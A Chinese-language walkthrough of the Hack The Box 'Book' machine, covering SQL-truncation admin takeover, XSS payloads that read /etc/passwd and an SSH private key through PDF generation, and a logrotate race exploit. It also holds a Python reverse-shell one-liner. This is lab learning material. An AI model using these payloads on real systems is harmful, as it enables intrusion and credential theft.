2020-04-15
2.1k
HTB::Book Walkthrough
0x01 Info Card
nmap
dirb
pspy
SQL Truncate
XSS LFI
logrotate exp
0x03 Pentesting
Initial Enumeration
端口扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 # Nmap 7.80 scan initiated Fri Apr 3 22:48:24 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.176 Nmap scan report for 10.10.10.176 Host is up (0.43s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA) | 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA) |_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: LIBRARY - Read | Learn | Have Fun Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Apr 3 22:49:38 2020 -- 1 IP address (1 host up) scanned in 73.80 seconds
路径扫描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 $ dirb http://10.10.10.176 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue Apr 14 02:23:14 2020 URL_BASE: http://10.10.10.176/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.176/ ---- ==> DIRECTORY: http://10.10.10.176/admin/ ==> DIRECTORY: http://10.10.10.176/docs/ ==> DIRECTORY: http://10.10.10.176/images/ + http://10.10.10.176/index.php (CODE:200|SIZE:6800) + http://10.10.10.176/server-status (CODE:403|SIZE:277) ---- Entering directory: http://10.10.10.176/admin/ ---- ==> DIRECTORY: http://10.10.10.176/admin/export/ + http://10.10.10.176/admin/index.php (CODE:200|SIZE:6291) ==> DIRECTORY: http://10.10.10.176/admin/vendor/ ---- Entering directory: http://10.10.10.176/docs/ ---- ---- Entering directory: http://10.10.10.176/images/ ---- ---- Entering directory: http://10.10.10.176/admin/export/ ---- ---- Entering directory: http://10.10.10.176/admin/vendor/ ---- ==> DIRECTORY: http://10.10.10.176/admin/vendor/composer/ ---- Entering directory: http://10.10.10.176/admin/vendor/composer/ ---- ----------------- END_TIME: Tue Apr 14 04:45:39 2020 DOWNLOADED: 32284 - FOUND: 4
Getting User Access
查看80端口,有一个登录和注册页面,我们先正常注册和登录之后进站点看看,有三个点值得注意:
Contact Us界面表明了有一个管理员账号admin@book.htb
View Profile界面表明了现在账号的权限是User
Collections界面有一个上传功能
首先尝试能不能垂直越权,用admin@book.htb
注册账号,Burp拦截请求
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /index.php HTTP/1.1 Host: 10.10.10.176 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.10.176/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: close Cookie: PHPSESSID=mq1sob5pmstq0i55csvmlafcre Upgrade-Insecure-Requests: 1 name=admin&email=admin@book.htb&password=123321
并且查看注册页面源码发现email字段有JS验证
1 2 3 4 5 6 7 8 9 10 11 12 function validateForm ( ) { var x = document .forms["myForm" ]["name" ].value; var y = document .forms["myForm" ]["email" ].value; if (x == "" ) { alert("Please fill name field. Should not be more than 10 characters" ); return false ; } if (y == "" ) { alert("Please fill email field. Should not be more than 20 characters" ); return false ; } }
这里的越权方式:在admin@book.htb
后面用空格填充至20个字符在加上一个任意字符,一共21个字符。
1 name=admin&email=admin@book.htb C&password=123321
注册成功后,用admin@book.htb
登录站点,发现自己的身份仍然是User
,转而到http://10.10.10.176/admin
页面登录,然而结果是Nope,猜测一下原因可能是因为name
字段重复,再重新走一遍注册流程:
1 name=admin2&email=admin@book.htb C&password=123321
登录admin站点成功。接着开始尝试Collections模块,在用户端上传一个pdf文件,内容随意
在管理面板中下载Collections PDF
可以看到刚刚上传的pdf文件
梳理一下逻辑,我们提供的数据可以呈现在pdf中,因此我们可以通过XSS提取本地文件。Google一下LFI XSS,Noob-ninja已经提供了相关的利用方式:https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html
payload:
1 <script>x=new XMLHttpRequest;x.onload=function ( ) {document .write(this .responseText)};x.open("GET" ,"file:///etc/passwd" );x.send();</script>
上传之后再从管理面板下载Collections PDF
成功拿到一个用户名reader
,再去主目录拿SSH key
payload:
1 <script>x=new XMLHttpRequest;x.onload=function ( ) {document .write(this .responseText)};x.open("GET" ,"file:///home/reader/.ssh/id_rsa" );x.send();</script>
但是PDF显示有问题,用pdfminner.six工具转换成text
https://github.com/pdfminer/pdfminer.six
1 $ python3 tools/pdf2text.py 68498.pdf > id_rsa
SSH reader login
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 $ssh -i id_rsa.txt reader@book.htb The authenticity of host 'book.htb (10.10.10.176)' can't be established. ECDSA key fingerprint is SHA256:QRw8pCXg7E8d9sWI+0Z9nZxClJiq9/eAeT/9wUfoQQk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'book.htb' (ECDSA) to the list of known hosts. Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Mar 2 15:30:16 UTC 2020 System load: 0.28 Processes: 194 Usage of /: 27.1% of 19.56GB Users logged in: 1 Memory usage: 39% IP address for ens33: 10.10.10.176 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 114 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Tue Apr 14 06:05:21 2020 from 10.10.17.235 reader@book:~$ id uid=1000(reader) gid=1000(reader) groups=1000(reader) reader@book:~$ ls backups lse.sh user.txt
Getting Root Access
主目录下有一个backups文件夹:
1 2 3 4 5 6 7 8 9 reader@book:~$ cd backups/ reader@book:~/backups$ ls -la total 12 drwxr-xr-x 2 reader reader 4096 Jan 29 13:05 . drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 .. -rw-r--r-- 1 reader reader 0 Jan 29 13:05 access.log -rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.1 reader@book:~/backups$ cat access.log.1 192.168.0.104 - - [29/Jun/2019:14:39:55 +0000] "GET /robbie03 HTTP/1.1" 404 446 "-" "curl"
用pspy监控靶机运行的服务:
1 2 3 4 2020/04/14 10:17:39 CMD: UID=0 PID=78202 | sleep 5 2020/04/14 10:17:44 CMD: UID=0 PID=78205 | /usr/sbin/logrotate -f /root/log.cfg 2020/04/14 10:17:44 CMD: UID=0 PID=78204 | /bin/sh /root/log.sh 2020/04/14 10:17:44 CMD: UID=0 PID=78206 | sleep 5
如果logrotate是以root身份运行,并且普通用户对logrotate轮询的日志文件具有写的权限,那么就有一种漏洞利用可以提权。我们先来验证一下access.log是不是轮询的文件,向其中写入10M的随机比特流数据:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 reader@book:~/backups$ head -c 10M < /dev/urandom > access.log reader@book:~/backups$ ls -la total 10252 drwxr-xr-x 2 reader reader 4096 Jan 29 13:05 . drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 .. -rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log -rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.1 reader@book:~/backups$ ls -la total 10252 drwxr-xr-x 2 reader reader 4096 Apr 15 02:35 . drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 .. -rw-r--r-- 1 reader reader 0 Apr 15 02:35 access.log -rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log.1 -rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.2
很明显,多了一个access.log.2
日志文件。
从https://github.com/whotwagner/logrotten下载logrotate exploit到本机,上传至靶机的主目录并编译:
1 reader@book:~ gcc -o logrotten logrotten.c
再准备一个payloadfile,写入reverse shell,在本机监听4444端口
1 2 reader@book:~ cat payloadfile python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.55",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
然后执行exploit
1 2 reader@book:~ ./logrotten -p ./payloadfile /home/reader/backups/access.log Waiting for rotating backups/access.log...
于此同时,在另外一个终端登录靶机,向轮询日志中写入随机数据,观察主机4444端口:
1 2 3 4 5 $nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.15.152] from (UNKNOWN) [10.10.10.176] 50008 # cat /root/root.txt 84da9--------------------0dd89714
0x04 Reference
https://github.com/whotwagner/logrotten
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf
https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html